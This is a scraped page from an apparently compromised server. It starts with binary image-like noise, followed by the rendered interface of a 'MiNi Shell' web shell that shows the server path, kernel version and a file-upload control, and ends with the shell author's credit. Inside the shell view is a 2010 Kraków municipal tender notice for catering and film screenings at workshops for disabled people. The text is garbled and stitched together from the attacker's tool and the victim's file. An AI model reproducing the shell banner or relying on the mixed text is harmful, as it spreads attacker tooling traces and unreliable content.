JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101001/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101001/313954-N-2010.html

<p class="kh_header"><b>Kraków: Świadczenie usługi cateringowej oraz usługi projekcji filmu podczas warsztatów kompetencji życiowych dla osób niepełnosprawnych</b><br>
<b>Numer ogłoszenia: 313954 - 2010; data zamieszczenia: 01.10.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej w Krakowie , ul. Józefińska 14/002, 30-529 Kraków, woj. małopolskie, tel. 012 6165420, 6165424, faks 012 6165428.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mops.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usługi cateringowej oraz usługi projekcji filmu podczas warsztatów kompetencji życiowych dla osób niepełnosprawnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest świadczenie usługi cateringowej oraz usługi projekcji filmów informacyjnych dotyczących dostępnych w projekcie Pora na aktywność usług dla osób niepełnosprawnych podczas warsztatów kompetencji życiowych dla osób niepełnosprawnych. Filmy, o których mowa w zdaniu poprzedzającym dostarczy Zamawiający. 
2.	Usługi będące przedmiotem zamówienia będą realizowane dla 55 osób niepełnosprawnych, w tym poruszających się przy pomocy wózka inwalidzkiego oraz 12 opiekunów.
3.	 W ramach warsztatów kompetencji życiowych osoby niepełnosprawne:
a)	będą zapoznawały się z funkcjonowaniem Wojewódzkiej Biblioteki Publicznej w Krakowie, 
b)	obejrzą w lokalu Wykonawcy pokaz filmów informacyjnych dotyczących dostępnych w projekcie Pora na aktywność usług dla osób niepełnosprawnych, 
c)	będą uczestniczyć w dyskusji,
d)	spożyją ciepły posiłek zapewniony przez Wykonawcę.
4.	W ramach realizacji przedmiotu zamówienia Wykonawca zapewni:
a)	lokal spełniający warunki określone w pkt. 7 i 8 postanowień dodatkowych dotyczących przedmiotu zamówienia zawartych w rozdziale II Specyfikacji,
b)	sprawny technicznie sprzęt konieczny do wyświetlania filmów: ekran, rzutnik multimedialny, laptop - komputer, nagłośnienie pozwalające na zrozumienie wypowiedzi przez osoby niedosłyszące w stopniu lekkim,
c)	możliwość uczestniczenia w warsztatach także opiekunom osób niepełnosprawnych,
d)	ciepły posiłek: schab ze śliwką (200g na osobę) w sosie myśliwskim (50g na osobę), ziemniaki pieczone z ziołami (150g na osobę), zestaw surówek (150g na osobę, co najmniej 3 surówki do wyboru) i deser: ciasto biszkoptowe z kremem czekoladowym (50g na osobę),
e)	napoje ciepłe i zimne: herbata (200 ml na osobę), kawa (150 ml na osobę), woda mineralna niegazowana (150 ml na osobę), cukier (4 paluszki na osobę),
f)	odpowiednią jakość posiłku i ciepłych napojów z uwzględnieniem temperatury                 i innych wymogów określonych w przepisach ustawy z dnia 25 sierpnia 2006 roku                     o bezpieczeństwie żywności i żywienia (Dz. U. z 2010r. nr 136, poz. 914                               ze zmianami) wraz z aktami wykonawczymi oraz przepisów ustawy z dnia                    14 marca 1985 roku o Państwowej Inspekcji Sanitarnej (tekst jednolity: Dz. U. z 2006r.  nr 122, poz. 851 ze zmianami),
g)	osobę lub osoby prowadzącą warsztaty i obsługującą sprzęt przeznaczony do prezentacji. 
Postanowienia dodatkowe dotyczące przedmiotu zamówienia:

1. Uczestnikami warsztatów będą osoby niepełnosprawne w stopniu znacznym i umiarkowanym ze schorzeniami narządu ruchu, w tym poruszające się przy pomocy wózka inwalidzkiego. Z tego powodu odległość z Biblioteki do lokalu, w którym będą zorganizowane warsztaty nie może być większa niż 200 metrów. W przeciwnym wypadku Wykonawca zobowiązany jest zapewnić uczestnikom i ich opiekunom transport dostosowany do potrzeb wynikających z niepełnosprawności. Lokal, w którym będą świadczone usługi musi być dostosowany do potrzeb uczestników, wynikających z niepełnosprawności. 
2.	W związku z niepełnosprawnością uczestników w warsztatach muszą także uczestniczyć opiekunowie: 2 opiekunów na grupę. Opiekunowie także otrzymają posiłek i napoje.
3.	W przypadku uczestnictwa mniejszej grupy niż planowana, jeżeli nieobecność uczestnika/ów będzie wynikała z przyczyn niezależnych od Zamawiającego, Zamawiający pokryje koszt uczestnictwa tylko obecnych na warsztatach osób.
4.	W ramach prowadzenia warsztatów Zamawiający oczekuje: przywitania uczestników, stworzenia listy obecności (tabela, w której uczestnicy i opiekunowie złożą swoje podpisy), przedstawienia informacji na temat projektu Pora na aktywność i komentarzy do prezentowanych filmów (zgodnie z informacją przekazaną po podpisaniu umowy przez Zamawiającego), prowadzenia dyskusji po projekcji filmów, pożegnania uczestników, możliwość wykonania zdjęć w trakcie trwania warsztatów przez przedstawiciela Zamawiającego. 
5.	Uczestnicy warsztatów będą podzieleni na 6 grup, liczących maksymalnie do 12 osób, w tym 2 opiekunów. Grupy będą odbywać zajęcia w godzinach przedpołudniowych, nie później niż do godziny 13.00. Po godzinie 13.00 może się jedynie odbyć posiłek. Ze względu na ograniczony czas wizyt jak                    i liczebność grupy w Wojewódzkiej Bibliotece Publicznej, zajęcia dla dwóch grup muszą odbywać się jednocześnie (np. pierwsza grupa w bibliotece, druga - uczestniczy w projekcji filmów, następnie zamiana, posiłek może odbyć się zarówno dla obu grup razem jak i dla każdej grupy osobno). Wykonawca przedłoży Zamawiającemu harmonogram do akceptacji, uwzględniając, że jednorazowo w zajęciach w Bibliotece może uczestniczyć maksymalnie 10 osób niepełnosprawnych  oraz ich opiekunowie,  uwzględniając czas konieczny do pokonania dystansu pomiędzy Biblioteką a lokalem, w którym będą zorganizowane warsztaty.
6.	Warsztaty przeprowadzone w lokalu Wykonawcy będą trwały nie dłużej niż trzy godziny dla jednej grupy, czas może być rozbity na dwie części: przeznaczoną na udział w projekcji filmów i posiłek. Wizyta w bibliotece dla każdej grupy potrwa półtorej godziny. 
7.	Lokal Wykonawcy położony w odległości max 200 metrów od Wojewódzkiej Biblioteki Publicznej w Krakowie albo w granicach administracyjnych Krakowa pod warunkiem, że Wykonawca zapewni transport uczestników spotkania z Biblioteki do lokalu z lokalu do Biblioteki zgodnie z harmonogramem spotkania.
8.	Lokal musi być przystosowany do osób niepełnosprawnych (brak barier architektonicznych, np.: podjazdy lub brak schodów, lokal na parterze lub z windą, odpowiednia szerokość korytarzy, drzwi, dostosowane toalety). Lokal powinien być wyposażony w salę, w której będą wyświetlane filmy, a także  jednorazowo będzie mogło spożyć posiłek 19 uczestników i 4 opiekunów) 
Zamówienie będzie realizowane w dniach: 14, 21 oraz 28 października 2010 roku, w godzinach 09.00 - 14:00 (wizyta w Wojewódzkiej Bibliotece Publicznej w Krakowie, przy ul. Rajskiej nr 1 może się rozpocząć najwcześniej o godz. 09:00, a najpóźniej o godz. 10:30).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający może udzielić Wykonawcy zamówień uzupełniających w trybie zamówienia z wolnej ręki w okresie 3 lat od udzielenia zamówienia podstawowego, stanowiących nie więcej niż 50% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówienia</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.30.00.00-3, 92.13.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.10.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> tak</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień umowy może nastąpić za zgodą obu stron wyrażoną w formie pisemnej pod rygorem nieważności.
Zmiany mogą dotyczyć takich kwestii jak: termin realizacji zamówienia, warunki płatności oraz miejsce realizacji zamówienia.
Niedopuszczalna jest - pod rygorem nieważności - taka zmiana niniejszej umowy oraz wprowadzenie do niej takich postanowień, które byłyby niekorzystne dla Zamawiającego. Nie dotyczy to sytuacji, gdy konieczność wprowadzenia takich zmian wyniknie z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mops.krakow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej
ul. Józefińska 14
30-529 Kraków
pok.002.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.10.2010 godzina 10:00, miejsce: Miejski Ośrodek Pomocy Społecznej
ul. Józefińska 14
30-529 Kraków
Dziennik podawczy.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com